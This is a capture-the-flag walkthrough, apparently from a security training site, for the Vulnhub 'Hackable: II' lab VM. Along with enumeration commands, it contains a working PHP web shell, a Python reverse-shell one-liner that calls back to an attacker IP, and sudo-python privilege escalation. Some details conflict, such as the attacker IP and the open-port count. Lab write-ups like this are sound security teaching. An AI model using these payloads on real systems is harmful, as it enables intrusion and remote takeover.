Capture the flag (CTF)

HACKABLE: II CTF Walkthrough

As you may know from previous articles, Vulnhub.com is a platform that provides vulnerable applications/machines to gain practical hands-on experience in the field of information security. You can check my previous articles for more CTF challenges. I have also provided a downloadable URL for this CTF below; you can download the machine and run it on VirtualBox.

https://download.vulnhub.com/hackable/hackableII.ova

The torrent downloadable URL is also available for this VM; it's been added in the reference section of this article.

As per the information given on Vulnhub, it was posted by the author Elias Sousa. This is an easy level CTF as per the description provided by the author. The author does not post much information, but we assume that it would require getting to the root and collecting the flag. Pre-requisites would be knowledge of Linux commands and the ability to run some essential penetration testing tools.

Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

The steps

The summary of the steps required in solving this CTF is below:

1. Getting the target machine IP address by Netdiscover
2. Getting open port details by using the Nmap Tool
3. Enumerating HTTP port with Dirb
4. Enumerating FTP service and uploading shell
5. Getting the reverse connection and reading the user flag
6. Getting the root

 So, now that we have all the information we need let's get started with the challenge. 

The walkthrough

Step 1

After downloading and running this machine on VirtualBox, the first step is to explore the VM by running Netdiscover command to get the IP address of the target machine. The Netdiscover command output can be seen in the screenshot given below.

Command used: << netdiscover >>

As we can see above, we have the Virtual Machine IP address: 192.168.1.24 (the target machine IP address). We will be using 192.168.1.14 as the attacker's IP address.

Please note the target and attacker machine IP addresses may be different as per your network configuration.

Step 2

After getting the target machine's IP address, the next step is to find the open ports and services available on the target machine. I conducted an Nmap full-port scan for this purpose. The Nmap results can be seen in the screenshot given below.

Command used: << nmap -p- -sV 192.168.1.24 >>

In the Nmap command, we used the '-sV' switch for version enumeration. We also used the '-p-' option for full port scan. The Nmap output shows just the HTTP port 80 as open on the target machine. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is especially important to conduct a full port scan during the pentest or solving the CTF for maximum results.

We identified three open ports on the target machine. Port 21 is open for the FTP service, port 22 is being used for SSH and port 80 is being used for the HTTP service. Now that we have gathered all the information about the target system's entry points let's start enumerating with the HTTP port first.

Step 3

We opened the target machine IP address on the browser to see the web application. It can be seen in the following screenshot.

As can be seen above, we just got the default apache page. This means that the apache service is running on the target machine and the path to the target application is different. We decided to run a web application file enumeration attack to identify hidden files and folders on the target application. We used the Dirb tool for this purpose, which is by default available in Kali Linux. The scan command and the results can be seen below.

Command used: << dirb http://192.168.1.24/ >>

The scan took some time to complete, and in the results, we identified a directory named 'files.' We opened it into the browser to see any further clues. It can be seen below.

When we opened the folder '/files' on the browser, we found that directory listing was enabled on the target application, and there was an HTML file named 'call.html' available in the folder. Let's access the HTML file on the browser as there could be further hints.

As can be seen above, there was just a simple text on the page, and nothing else could be found to proceed further. We tried checking the HTML source of the page and used few tools to further identify hidden files, but none of them could be used. So, let's move on to the next open port.

Step 4

The second open port, as identified in the port scanning step, is FTP port 21. So, let's try to explore and analyze the FTP port.

Command used: FTP 192.168.1.24

We tried a few common FTP usernames and found that the 'anonymous' user is enabled on the target machine. The default password was also left unchanged, which allowed us to get FTP access if the target machine was user anonymous. The credentials used are given below for reference.

Username: anonymous

Password: anonymous

Command used:

<< ftp 192.168.1.24 >>

<< ls >>

We started exploring the target machine as this user and found the 'CALL.html' file in the current directory. This means that we have landed into the HTML directory of the target application and we already know the path to the 'call.html' file.

We decided to write a web shell that can be accessed on the browser.  

Command used:

cat >> shell.php

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

cat shell.php

In the above screenshot, we created a shell file on our attacker machine, wrote a command execution payload and saved the file as 'shell.php.' 

After that, we verified the web shell by using the cmd command. We'll now upload it on the target machine, which can be seen in the following screenshot.

Command used: << put shell.php >>

We uploaded the 'shell.php' file on the target machine using the FTP put command. After that, we verified whether the file was successfully uploaded by using the ls command. We can see the 'shell.php' file in the same directory as 'call.html.' Let's go to the same URL where we found the call.html file on the target application.

As can be seen above, our web shell can be seen in the files directory. Let's open the file on the browser and test whether we can execute commands on the target machine through the browser. This can be seen below.

We ran the 'ls' command on the target machine by entering the command 'cmd' for the parameter value. The above results on the browser prove that the command was successfully executed, and the browser displays the files in the current directory.

In the next step, we will take the reverse connection of the target machine.

Step 5

As the goal of the CTF is to gain root access to the target machine, we decided to execute a python reverse proxy payload to get access to the target machine.

We wrote a payload on our attacker machine and configured our attacker machine's IP address and listener port as 1234. The payload is given below for reference:

Python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After this, we opened Netcat on our attacker machine and configured it to listen to incoming connections on port 1234.

Command used; << nc -lvp 1234 >>

We executed the payload on the target machine by entering the 'cmd' parameter value. The complete URL is given below.

URL:

http://192.168.1.24/files/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.28%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

As can be seen in the above screenshot, after sometime we got access of the target machine on the netcat terminal. Let’s explore the target machine and find our way to the root.

Command used:

• << id >>
• << python3 -c 'import pty;pty.spawn("/bin/bash")' >>
• << cat /etc/issue >>
• << uname -a >>

First, we used the 'id' command to check the current user privilege and found a limited shell. After that, we ran a python command to gain a stable shell connection.

After gaining stable access to the target machine, we enumerated for identifying the target machine operating system and kernel version. We read the 'etc/issue' file and ran 'uname –a' command to gather the information. We searched the web to find a working exploit for the available versions, but none could be found. So, we continued exploring the target machine by visiting various directories.

During enumeration, we found an interesting file in the 'home' directory on the target machine, which can be seen highlighted in the below screenshot.

Command used: << ./.runme.sh >>

As can be seen above, there were two files available in the home directory. The root user owned one, and the other was owned by a user named 'shrek.' We opened the text file named 'important.txt', which hinted to run a script to see the data. We executed the script where we found a nice design along with a hash string. The hash can be seen below for reference:

Hash: cf4c2232354952690368f1b3dfdfb24d

Command used: << cat /.runme.sh >>

We do not know what the hash is for, so we used the cat command to read the script for clues, but nothing new or useful could be found. We instead decided to use an online password cracker to decrypt the hash. This can be seen in the following screenshot.

We opened an online website called 'crackstation' to decrypt the hash. We found that it was an md5 hash and the hash cracker provided us the password: 'onion.' We'll try to login to user 'shrek' using this identified password.

Command used: << su shrek >>

<< cat user.txt >>

As seen above, the password was correct for user' shrek,' so we are now logged into the target machine as user shrek. In the same directory, we found our first flag - 'user.txt.' The flag file can be read in the above screenshot. 

Step 6

Until now, we got the user flag, so let's explore the target machine further. We tried visiting various directories and files, but no clue could be found. We started enumerating configuration flaws on the target machine, during which we found an interesting loophole in the target machine as follows:

Command used: << sudo -l >>

We used the 'sudo –l' command to check permissions and found that python can be executed as root. We can get shell access by exploiting this binary.

Command used: << sudo /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")' >>

The above command escalated user privilege from username shrek to root. So far, we have read a user flag and gained root access to the target machine. The last step to complete the CTF is reading the root flag.

Command used: << cat /root/root.txt >>

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

As can be seen above, the root flag was not difficult to find. The root flag can be read in the above screenshot.

This completes the CTF challenge. It was an interesting exercise, I think! Stay tuned for many more pretesting challenges and solutions.

 

Sources:

• Reverse Shell Cheat Sheet, Pentestmonkey
• Hackable-ii, Vulnhub
• Hackable-ii, Vulnhub
• Hackablell.ova, Vulnhub